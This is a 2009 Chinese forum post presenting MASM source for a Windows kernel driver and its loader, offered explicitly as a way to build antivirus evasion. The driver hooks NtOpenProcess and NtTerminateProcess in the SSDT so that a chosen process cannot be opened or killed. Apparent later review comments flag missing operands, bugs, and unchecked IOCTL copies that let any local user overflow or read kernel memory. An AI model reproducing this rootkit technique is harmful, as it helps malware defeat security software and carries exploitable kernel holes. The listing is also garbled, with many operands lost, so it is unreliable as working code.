fuchou-angle 发表于 2009-7-12 09:30:50

用汇编自己打造一个最简单的免杀

用汇编自己打造一个最简单的免杀
先说一下这两天学习驱动的心得吧,嗯嗯,有点小小的进展,现在已经能够拦截系统的内核函数了,不过要对付杀软恐怕还差得远。不过我想大家都是初学,慢慢来吧。我之所以学习驱动编程,就是奔着免杀来的,哈哈哈,我想大家也是同一个目的吧。好了,废话不多说了:代码如下:
本程序只HOOK了两个系统API
1: NtOpenProcess
2: NtTerminateProcess
并且KeServiceDescriptorTable用的是硬编码,所以大家写的时候要检查自己的头文件中是否有KeServiceDescriptorTable这个声明。另外需要注意:直接改写SSDT并清除CR0的WP位只适用于32位内核(64位内核的补丁保护会直接蓝屏);而且这两个hook一旦装上,对系统中所有进程的NtOpenProcess/NtTerminateProcess调用都生效,并不只是被保护的那个进程。
下面是驱动部分:
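.586P
.model flat, stdcall
option casemap:none
include SKY1.inc                        ; project include: kernel types, Io*/Ke* prototypes, UI macro, KeServiceDescriptorTable

; IOCTL codes: CTL_CODE(0x900, fn, METHOD_BUFFERED, FILE_ANY_ACCESS).
; FILE_ANY_ACCESS means the codes themselves impose no access check on the caller.
IOCTL_READ_DATA    equ 9002004H         ; fn 801h: copy szdata out to the caller
IOCTL_WRITE_DATA   equ 9002008H         ; fn 802h: copy caller data into szdata
IOCTL_BEEP_TEST    equ 9002000H         ; fn 800h: beep only
MAX_BUF_LEN        equ 100H             ; size of szdata; also passed to IoCreateDevice as the device-extension size
.data
old_open dd ?                           ; original NtOpenProcess handler (saved by DriverEntry, restored by drUnLoad)
off_open dd ?                           ; address of its SSDT slot
old_ter dd ?                            ; original NtTerminateProcess handler
off_ter dd ?                            ; address of its SSDT slot
szdata db 100h dup(?)                   ; PID table filled by user mode through IOCTL_WRITE_DATA; HookOpen compares against it
.const
UI "\\Device\\SKY1",szDevice,4
UI "\\??\\SKY1",szSymbol,4              ; global \?? link: any local user can open the device unless a DACL is applied elsewhere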
.code
; GetSysAddr FuncName
; Locate the SSDT slot that serves the Zw* stub FuncName. 32-bit kernels
; only: KeServiceDescriptorTable is exported by x86 ntoskrnl alone, hence the
; post's remark about declaring it by hand.
; Out:      ecx = address of the service-table slot, eax = handler currently in it
;           (DriverEntry stores eax into old_* and ecx into off_*).
; Clobbers: eax, ecx, flags.
; NOTE(review): the memory operands of the four "mov eax," and two "mov ecx,"
; lines were lost in extraction (bracketed operands did not survive), so the
; macro does not assemble as shown. What survives - an index scaled by 4
; (shl eax,2) added to a pointer loaded via KeServiceDescriptorTable - is the
; usual "ServiceTableBase + index*4" walk; restore the exact operands from the
; original post before use.
GetSysAddr MACRO FuncName
mov eax,                                ; (operand lost) starts from FuncName
mov eax,
mov eax,
mov eax,                                ; (operand lost) presumably ends with eax = service index
shl eax,2                               ; eax = index * sizeof(PVOID)
mov ecx,KeServiceDescriptorTable        ; hard-coded table address, per the post
mov ecx,                                ; (operand lost) presumably ServiceTableBase
mov ecx,
add ecx,eax ;                           ; ecx = &ServiceTableBase[index]
mov eax, ;(operand lost) eax = handler in that slot. Original note: ECX -> slot ("Index"), EAX -> handler ("Offset")
ENDM
; music n:DWORD
; Beep the PC speaker through the PIT, then busy-wait n*65536 loop iterations
; before switching it off. Preserves eax (push/pop) and ecx (uses).
; Called from DriverEntry, from the IOCTL_BEEP_TEST path and from inside both
; hooks - i.e. in the context of whichever thread made the system call, which
; the spin below stalls.
music proc uses ecx n:DWORD
push eax
mov al,0b6h
out 43h,al                              ; PIT control word: channel 2, lo/hi byte access, mode 3 (square wave)
in al,40h                               ; read a count byte from channel 0...
out 42h,al                              ; ...and use it as channel 2's reload low byte
in al,40h
out 42h,al                              ; high byte likewise: the pitch is effectively whatever channel 0 held
mov al,03h
out 61h,al                              ; port 61h bits 0-1 set: gate channel 2 and enable the speaker (other bits written as 0)
mov ecx,n
shl ecx,16                              ; ecx = n * 65536 iterations
@@: nop
loop @b                                 ; busy-wait; no timer primitive, so the duration depends on CPU speed
mov al,0fch
out 61h,al                              ; bits 0-1 cleared: speaker off
pop eax
ret
music endp

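; HookTer - replacement for NtTerminateProcess(ProcessHandle, ExitStatus).
; Stack on entry: [esp] = return address, [esp+4] = ProcessHandle, [esp+8] = ExitStatus.
; It never calls the original (old_ter) and never inspects ProcessHandle, so
; every termination request on the system is refused - not only those aimed
; at the protected PID - and ordinary process exit goes through
; NtTerminateProcess as well. Filtering would need the handle resolved to a
; PID, which this listing does not do.
; Change from the original: return STATUS_ACCESS_DENIED instead of
; STATUS_SUCCESS, so a refused caller does not believe the kill succeeded.
HookTer:
push 4fh
call music                              ; audible alert; music is stdcall and pops its own argument
mov eax,0C0000022h                      ; STATUS_ACCESS_DENIED
ret 08H                                 ; stdcall: pop the two DWORD arguments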
; HookOpen - replacement for NtOpenProcess(ProcessHandle, DesiredAccess,
; ObjectAttributes, ClientId): four DWORD arguments, hence ret 10h.
; If the target PID matches the entry at szdata the call is refused without
; reaching the original; otherwise it tail-jumps to old_open with the
; caller's stack untouched.
; NOTE(review): the memory operands of the two "mov eax," lines and of
; "cmp eax," were lost in extraction; the original comments say they fetch
; the PID from ClientId and compare it with the table - restore before use.
; NOTE(review): the refused path returns STATUS_SUCCESS (xor eax,eax) but
; never writes *ProcessHandle, so the caller sees success with an
; uninitialised handle; STATUS_ACCESS_DENIED would be the honest answer.
; Only the one entry at szdata is compared, and nothing checks who the
; caller is, so the protected process cannot open itself either.
HookOpen: ;our NtOpenProcess hook starts here
mov eax,                                ; (operand lost) per the original comment: reach ClientId
mov eax, ;(operand lost) eax = PID from ClientId
pushfd
push ecx ;save ecx and flags for the fall-through path
lea ecx,szdata ;ecx -> PID table written by user mode via IOCTL_WRITE_DATA
cmp eax, ;(operand lost) is this the protected PID?
jz return ;yes: refuse the open
pop ecx
popfd
jmp old_open ;no: continue in the original NtOpenProcess with the original frame
return: pop ecx
popfd
invoke music,1 ;audible "di-di"
xor eax,eax                             ; STATUS_SUCCESS - see NOTE above
ret 10H ;pop the four DWORD arguments
; SYS_HOOK pIdxOf:DWORD, HookADDR:DWORD
; Store HookADDR into the SSDT slot at address pIdxOf. Used both to install a
; hook (DriverEntry) and to put the saved original back (drUnLoad).
; eax on return is the last CR0 value, nothing callers use. Clobbers eax, ecx.
; The slot is normally in a read-only mapping, so CR0.WP is cleared around the
; store. 32-bit-only technique: x64 kernels bug-check on SSDT modification.
; NOTE(review): CR0.WP is bit 16 (10000H); the mask used here is 1000H
; (bit 12), which does not touch WP - either a digit lost in extraction or a
; bug in the original. If the store still worked, the target page was
; writable anyway (e.g. a kernel mapped with large pages).
; NOTE(review): cli/sti only mask interrupts on this CPU; they do nothing
; against other CPUs reading the slot (a single aligned DWORD store is atomic
; on x86, so the exposure is ordering rather than tearing). sti also
; re-enables interrupts unconditionally instead of restoring the caller's
; state - pushfd/cli ... popfd would.
; NOTE(review): the destination of "mov ,eax" was lost in extraction; from
; the preceding mov ecx,pIdxOf it is the slot ecx points at.
SYS_HOOK proc pIdxOf:DWORD, HookADDR:DWORD
cli ;mask interrupts on this CPU while patching
mov eax,CR0
and eax,not 1000H                       ; intended: clear write protection (see NOTE on the mask)
mov CR0,eax ;intended: write protection off
mov eax,HookADDR
mov ecx,pIdxOf
mov ,eax                                ; (destination lost) store the new handler into the slot at ecx
mov eax,CR0
or eax,1000H                            ; same mask as above
mov CR0,eax ;intended: write protection back on
sti ;re-enable interrupts (unconditionally)
ret
SYS_HOOK endp
; drUnLoad pdr:PDRIVER_OBJECT - DriverUnload routine.
; Restores both SSDT slots to the handlers saved in DriverEntry, then removes
; the symbolic link and the device object. Returns 0.
; NOTE(review): there is no wait after unhooking, so a thread still inside
; HookOpen/HookTer (or spinning in music) when the image is freed would run
; unmapped code; a grace delay or an in-flight counter is customary.
; NOTE(review): the register in "(DRIVER_OBJECT PTR ).DeviceObject" was lost
; in extraction; eax holds pdr on the line before.
drUnLoad proc pdr:PDRIVER_OBJECT
;unhook before anything else: the slots must not point into this image once it is gone
invoke SYS_HOOK,off_open,old_open       ; NtOpenProcess slot <- original handler
invoke SYS_HOOK,off_ter, old_ter        ; NtTerminateProcess slot <- original handler
invoke IoDeleteSymbolicLink,ADDR szSymbol
mov eax,pdr
invoke IoDeleteDevice,(DRIVER_OBJECT PTR ).DeviceObject
xor eax,eax
ret
drUnLoad endp
; ioDispath pdev:PDEVICE_OBJECT, pIrp:PIRP - IRP_MJ_DEVICE_CONTROL handler.
; All three IOCTLs are METHOD_BUFFERED, so data travels through
; AssociatedIrp.SystemBuffer. The IRP is always completed with STATUS_SUCCESS
; and the routine returns 0; unknown control codes are silently accepted too
; (STATUS_INVALID_DEVICE_REQUEST would be the usual answer).
;
; SECURITY (review): neither copy checks a length.
;  - IOCTL_WRITE_DATA copies OutputBufferLength bytes from the system buffer
;    into szdata, which is 100h bytes: a caller passing a larger length
;    overwrites whatever follows szdata in kernel .data.
;  - IOCTL_READ_DATA copies InputBufferLength bytes out of szdata into the
;    system buffer: a larger length discloses the kernel memory after it.
;  The device is reachable through \??\SKY1, the codes carry FILE_ANY_ACCESS
;  and devCreCls accepts every open, so any local user can issue these unless
;  a restrictive DACL is applied elsewhere (DriverEntry applies none).
;  Compare each length against MAX_BUF_LEN and fail the IRP
;  (STATUS_BUFFER_TOO_SMALL / STATUS_INVALID_PARAMETER) before the rep movsb.
; NOTE(review): the lengths are crossed relative to the names - READ copies
; out InputBufferLength bytes, WRITE copies in OutputBufferLength bytes. The
; client in this post passes the same value for both, so it still works.
; NOTE(review): the "[edx]"/"[ebx]" bases on the field operands were lost in
; extraction; the assume directives show which register each belongs to.
; NOTE(review): this routine completes through "fastcall IoCompleteRequest"
; while devCreCls uses IofCompleteRequest; IoCompleteRequest is the stdcall
; export - confirm which one SKY1.inc actually declares for the fastcall macro.
ioDispath proc uses esi edi ebx pdev:PDEVICE_OBJECT, pIrp:PIRP
local ilen:ULONG
local olen:ULONG
mov edx,pIrp
Assume edx: PTR _IRP
push edx
IoGetCurrentIrpStackLocation edx        ; macro from the include; edx preserved around it
pop edx
mov ebx,eax                             ; ebx -> current IO_STACK_LOCATION
Assume ebx: PTR IO_STACK_LOCATION
mov eax,.Parameters.DeviceIoControl.InputBufferLength
mov ilen,eax                            ; caller-supplied, unchecked
mov eax,.Parameters.DeviceIoControl.OutputBufferLength
mov olen,eax                            ; caller-supplied, unchecked
mov ecx,.Parameters.DeviceIoControl.IoControlCode
cmp ecx,IOCTL_READ_DATA
jnz cmp1
push ecx
mov edi,.AssociatedIrp.SystemBuffer     ; destination: system buffer (copied back to the caller)
mov esi,offset szdata
mov ecx,ilen                            ; ilen bytes out of a 100h-byte array - no bound
push ecx
rep movsb ;copy szdata out toward user space
pop .IoStatus.Information               ; bytes to return = ilen
pop ecx
jmp retu
cmp1:cmp ecx,IOCTL_WRITE_DATA
jnz cmp2
push ecx
mov esi,.AssociatedIrp.SystemBuffer     ; source: caller data in the system buffer
mov edi,offset szdata
mov ecx,olen                            ; olen bytes into a 100h-byte array - no bound
push ecx
rep movsb ;copy user data into szdata
pop .IoStatus.Information
pop ecx
jmp retu
cmp2:cmp ecx,IOCTL_BEEP_TEST
jnz cmp3
push 5fh
call music                              ; stdcall, pops its argument
cmp3:
retu:xor eax,eax
mov .IoStatus.Status,eax                ; STATUS_SUCCESS for every code, known or not
fastcall IoCompleteRequest,pIrp,IO_NO_INCREMENT
xor eax,eax
assume ebx: nothing
assume edx: nothing
ret
ioDispath endp
; devCreCls pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
; Installed by DriverEntry into two MajorFunction slots (their indices were
; lost in extraction; presumably IRP_MJ_CREATE and IRP_MJ_CLOSE, given the
; name). Completes every such IRP with STATUS_SUCCESS and Information = 0,
; so anyone who can reach the symbolic link gets a handle. Returns 0.
; NOTE(review): the register in "(_IRP PTR ).IoStatus" was lost in
; extraction; eax holds pIrp from the line above.
devCreCls proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov eax,pIrp
xor ecx,ecx
mov (_IRP PTR ).IoStatus.Status,ecx     ; STATUS_SUCCESS
mov (_IRP PTR ).IoStatus.Information,ecx ; no bytes transferred
fastcall IofCompleteRequest, pIrp,IO_NO_INCREMENT
xor eax,eax
ret
devCreCls Endp
; DriverEntry pdr:PDRIVER_OBJECT, pus:PUNICODE_STRING
; Creates \Device\SKY1 and the \??\SKY1 link, fills in the dispatch table,
; then hooks NtOpenProcess and NtTerminateProcess in the SSDT and beeps.
; Returns STATUS_SUCCESS only when both device and link were created, else
; STATUS_DEVICE_CONFIGURATION_ERROR (kept in edi across the calls).
; BUG(review): the GetSysAddr/SYS_HOOK sequence sits outside the .if blocks,
; so the hooks are installed even on the failure path, and a DriverEntry
; that returns an error makes the I/O manager unload the image *without*
; calling drUnLoad - the SSDT is then left pointing into freed memory. Hook
; only on success, or unhook before returning the error.
; NOTE(review): IoCreateDevice gets MAX_BUF_LEN as the device-extension size
; (the extension is never used), 22H = FILE_DEVICE_UNKNOWN, characteristics 0
; and Exclusive = 0; no DACL is applied anywhere, so the default (in practice
; permissive) device security applies and every local user can open it.
; NOTE(review): the MajorFunction indices were lost in extraction.
DriverEntry proc uses esi edi pdr:PDRIVER_OBJECT, pus:PUNICODE_STRING
local pdev:PDEVICE_OBJECT
mov edi,STATUS_DEVICE_CONFIGURATION_ERROR ; edi = status to return; overwritten on full success
invoke IoCreateDevice,pdr,MAX_BUF_LEN,ADDR szDevice, 22H,0,0,ADDR pdev
.if eax==STATUS_SUCCESS
invoke IoCreateSymbolicLink,ADDR szSymbol,ADDR szDevice ; \??\SKY1 -> \Device\SKY1
.if eax==STATUS_SUCCESS
mov esi,pdr
assume esi: PTR DRIVER_OBJECT
mov .DriverUnload,offset drUnLoad       ; makes the driver unloadable; drUnLoad restores the SSDT
mov ecx,offset devCreCls
mov .MajorFunction,ecx                  ; (index lost) create/close handler
mov .MajorFunction, ecx                 ; (index lost)
mov .MajorFunction,offset ioDispath     ; (index lost) device-control handler
mov eax,.Flags
or eax,DO_BUFFERED_IO                   ; buffered I/O for read/write IRPs; the IOCTLs are METHOD_BUFFERED by their codes
mov .Flags,eax
mov edi,STATUS_SUCCESS
.else
invoke IoDeleteDevice,pdev              ; link failed: undo the device
.endif
.endif
assume esi: nothing
; --- hooks are installed regardless of edi; see BUG note above ---
GetSysAddr ZwOpenProcess                ; ecx = slot, eax = original handler
mov old_open,eax
mov off_open,ecx
invoke SYS_HOOK,ecx,offset HookOpen
GetSysAddr ZwTerminateProcess
mov old_ter,eax
mov off_ter,ecx
invoke SYS_HOOK,ecx,offset HookTer
invoke music,2fh ;beep to signal completion
mov eax,edi
ret
DriverEntry endp
end DriverEntry
下面是用户代码:
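.586
.Model FLAT,stdcall
Option CaseMap:None
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib

; IOCTL codes shared with the driver: CTL_CODE(0x900, fn, METHOD_BUFFERED, FILE_ANY_ACCESS)
IOCTL_READ_DATA    equ 9002004H         ; read the driver's data block back
IOCTL_WRITE_DATA   equ 9002008H         ; send the PID to protect
IOCTL_BEEP_TEST    equ 9002000H         ; beep only (not used by this client)
.data
szDrv db 'SKY1.sys',0                   ; driver file name; Getsyspath appends it to this EXE's directory
szDevice db '\\.\SKY1',0                ; user-mode name of the device (through the \??\SKY1 link)
szService db 'SKY1', 0                  ; service name
szClass db '#32770', 0                  ; window class: the system dialog class
fmt db '%d受到保护,ESC键可以退出!',0    ; "%d is protected, press ESC to quit"
DbgName db 'SeDebugPrivilege',0
.data?
buf db 100h dup(?)                      ; driver path built by Getsyspath
ouf db 100h dup(?)                      ; IOCTL_READ_DATA readback; the window title is formatted at offset 4
duf db 20h dup(?)                       ; 20h-byte scratch; NOTE(review): fmt expanded with a 10-digit PID is longer than this
hwnd dd ?
hPid dd ?                               ; our own PID, sent to the driver
hDevice dd ?                            ; handle to \\.\SKY1 (INVALID_HANDLE_VALUE on failure)
hSCManager dd ?
hService dd ?
Tmp dd ?                                ; a single DWORD: bytes-returned cell for DeviceIoControl
oldProc dd ?                            ; declared but not used in this listing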
.code
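; print value:DWORD - format value with fmt and show it in a message box.
; Preserves all general registers (pushad/popad). Not called from this listing.
; Change from the original: formats into a 128-byte stack buffer instead of
; the 32-byte global duf, which cannot hold fmt expanded with a 10-digit PID.
print proc value:dword
local text[128]:BYTE                    ; fmt text plus up to 11 characters of %d and a NUL
pushad
lea esi,text
invoke wsprintf,esi,offset fmt,value
xor ecx,ecx
invoke MessageBox,ecx,esi,esi,ecx       ; no owner window, text doubles as caption, MB_OK
popad
ret                                     ; stdcall epilogue pops the one DWORD argument
print endp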
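; Getsyspath - build the driver path in buf: this EXE's directory + szDrv.
; Returns eax = address of buf. On failure buf is left as an empty string
; (buf[0] = 0), so the caller's CreateService gets an unusable path instead
; of an out-of-bounds write.
; Changes from the original: uses GetModuleFileName's returned length instead
; of a forward rep scasb whose ecx was never initialised, rejects a
; truncated path (return value = buffer size), fails when no '\' is found,
; and checks that the 9-byte name fits before appending it.
; Clobbers: eax, ecx, esi, edi, flags; leaves DF clear.
Getsyspath PROC
invoke GetModuleHandle,0
invoke GetModuleFileName,eax,offset buf,100h
test eax,eax
jz gsp_fail                             ; API failed
cmp eax,100h
jae gsp_fail                            ; did not fit: may be truncated and unterminated
mov ecx,eax                             ; scan at most 'length' bytes
lea edi,buf[eax-1]                      ; edi -> last character of the path
std
mov al,5ch                              ; '\'
repnz scasb                             ; backwards, toward buf[0]
cld
jnz gsp_fail                            ; no '\' anywhere in the path
add edi,2                               ; after a backward match edi = match-1; skip to the byte after the '\'
lea ecx,[edi+9]                         ; end of 'SKY1.sys',0 once written
cmp ecx,offset buf+100h
ja gsp_fail                             ; would run past buf
lea esi,szDrv
movsd
movsd
movsb                                   ; 9 bytes: 'SKY1.sys' + NUL
mov eax,offset buf
ret
gsp_fail:
mov byte ptr buf,0
mov eax,offset buf
ret
Getsyspath Endp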
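; RemoveSKYDriver - stop and delete the 'SKY1' service.
; Returns eax = the (already closed) service handle, as the original did;
; callers here ignore it. Individual call failures are not checked, as before
; (on a clean machine OpenService simply fails and the rest is a no-op).
; Change from the original: ControlService's lpServiceStatus receives a
; SERVICE_STATUS, which is seven DWORDs (28 bytes); the original passed the
; 4-byte global Tmp, so the call overwrote the 24 bytes following it in .data?.
RemoveSKYDriver PROC
local svcStatus[7]:DWORD                ; SERVICE_STATUS: 7 DWORDs
invoke OpenSCManager,0,0,0F003FH        ; SC_MANAGER_ALL_ACCESS: requires an administrative token
mov hSCManager,eax
invoke OpenService,hSCManager,offset szService,0F01FFH ; SERVICE_ALL_ACCESS
mov hService,eax
invoke ControlService,hService,1,ADDR svcStatus ; 1 = SERVICE_CONTROL_STOP: runs drUnLoad in the driver
invoke DeleteService,hService
invoke CloseServiceHandle,hSCManager
invoke CloseServiceHandle,hService
mov eax,hService
ret
RemoveSKYDriver ENDP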
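; InstallSKYDriver lpDriverPath:DWORD
; Remove any stale registration, register lpDriverPath as a demand-start
; kernel driver service named 'SKY1', start it (this runs DriverEntry), open
; \\.\SKY1 and store the handle in hDevice.
; Returns eax = hDevice; INVALID_HANDLE_VALUE (-1) on any failure, which is
; what the caller tests for. Leaves edi = 0.
; Changes from the original: OpenSCManager and CreateService results are
; checked instead of being passed on as 0, and handles opened so far are
; closed on every path. StartService is still not checked - if the driver
; does not start, the CreateFile below fails and that is reported.
InstallSKYDriver PROC lpDriverPath:DWORD
call RemoveSKYDriver
xor edi,edi                             ; edi = 0 for every NULL/0 argument below
invoke OpenSCManager,edi,edi,0F003FH    ; SC_MANAGER_ALL_ACCESS: requires an administrative token
MOV hSCManager,eax
test eax,eax
jz isd_fail
lea esi,szService
invoke CreateService,hSCManager,esi,esi,SERVICE_ALL_ACCESS, \
SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL, \
lpDriverPath,edi,edi,edi,edi,edi
mov hService,eax
test eax,eax
jz isd_close_scm                        ; e.g. not an administrator, or path rejected
invoke StartService,eax, edi,edi        ; runs DriverEntry; failure surfaces as CreateFile failing below
invoke CreateFile,offset szDevice,GENERIC_READ OR GENERIC_WRITE,EDI,EDI,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,EDI
MOV hDevice,eax
push eax
invoke CloseServiceHandle,hService
invoke CloseServiceHandle,hSCManager
pop eax
ret 4
isd_close_scm:
invoke CloseServiceHandle,hSCManager
isd_fail:
mov eax,-1                              ; INVALID_HANDLE_VALUE, same as a failed CreateFile
mov hDevice,eax
ret 4
InstallSKYDriver ENDP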
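; SeDbg - enable SeDebugPrivilege in the current process token.
; Returns eax from the last call made (as before); success of the adjustment
; is not reported. Clobbers edi (left = 0).
; Changes from the original: the token is opened with only
; TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY (28h) rather than TOKEN_ALL_ACCESS,
; and the adjust/close are skipped when OpenProcessToken fails instead of
; running with an uninitialised hToken.
; NOTE(review): this privilege is not what authorises loading a driver; the
; service-manager calls in InstallSKYDriver need an administrative token
; regardless, and AdjustTokenPrivileges reports success with
; ERROR_NOT_ALL_ASSIGNED when the privilege is not held at all.
SeDbg proc
local hToken:DWORD
local token:TOKEN_PRIVILEGES
xor edi,edi
invoke OpenProcessToken,-1,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken ; -1 = current-process pseudo-handle
test eax,eax
jz sedbg_done
invoke LookupPrivilegeValue,edi,OFFSET DbgName,ADDR token.Privileges.Luid
mov token.PrivilegeCount,1
mov token.Privileges.Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,edi,ADDR token,sizeof token,edi,edi
invoke CloseHandle,hToken
sedbg_done:
ret
SeDbg endp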
; Entry point.
; 1. enable SeDebugPrivilege (not what gates driver loading - the SCM calls
;    need an administrator anyway), 2. build the driver path and install/
;    start the service, 3. send our own PID to the driver and read it back,
;    4. show a window and pump messages until ESC, 5. tear everything down.
; NOTE(review): the message loop below dispatches and translates the MSG
; *before* the first GetMessage, so on the first pass DispatchMessage and the
; ESC compare operate on uninitialised stack memory; the usual shape is
; GetMessage first, then Translate, then Dispatch. GetMessage's -1 error
; return is also treated as a message and loops.
; NOTE(review): the operand of "cmp dword ptr,1bh" was lost in extraction;
; 1bh is VK_ESCAPE, so it presumably reads the MSG's wParam field.
BEGIN:CALL SeDbg;elevate (see note above)
call Getsyspath;eax -> '<exe dir>\SKY1.sys'
invoke InstallSKYDriver,eax             ; eax = device handle or INVALID_HANDLE_VALUE; also stored in hDevice
inc eax
jz Close                                ; -1 + 1 = 0: install/open failed
call GetCurrentProcessId
mov hPid,eax
lea edi,hPid ;send our own PID to SKY1 (the driver stores it at szdata)
invoke DeviceIoControl,hDevice,IOCTL_WRITE_DATA,edi,4,edi,4,ADDR Tmp,0
mov ecx,Tmp                             ; bytes returned by the driver (its Information = 4)
lea esi,ouf
invoke DeviceIoControl,hDevice,IOCTL_READ_DATA,esi,ecx,esi,ecx,ADDR Tmp,0
lodsd                                   ; eax = PID read back; esi now -> ouf+4
cmp eax,hPid
jnz err0                                ; driver did not echo our PID: give up
invoke wsprintf,esi,offset fmt,eax      ; window title formatted at ouf+4
xor edi,edi
push edi
call GetModuleHandle                    ; hInstance for CreateWindowEx
invoke CreateWindowEx,edi,offset szClass,esi,0cf0000h,edi,edi,520,200,edi,edi,eax,edi ; 0cf0000h = WS_OVERLAPPEDWINDOW
or eax,eax
jz err0
mov hwnd,eax
invoke ShowWindow,eax,SW_SHOW
sub esp,40h ;stack space for a MSG (40h > sizeof MSG)
mloop: mov esi,esp
cmp dword ptr,1bh                       ; (operand lost) VK_ESCAPE?
jz unLoad
push esi
call DispatchMessage                    ; runs before any GetMessage on the first pass - see note
push esi
call TranslateMessage
invoke GetMessage,esi,edi,edi,edi
or eax,eax
jnz mloop                               ; 0 = WM_QUIT; -1 (error) keeps looping
unLoad: add esp,40h
invoke DestroyWindow,hwnd
err0:
invoke CloseHandle,hDevice
Close: call RemoveSKYDriver             ; stops the service, which runs drUnLoad and restores the SSDT
push eax
call ExitProcess
END BEGIN

chaqu` 发表于 2009-7-12 12:19:31

恩学习了啊...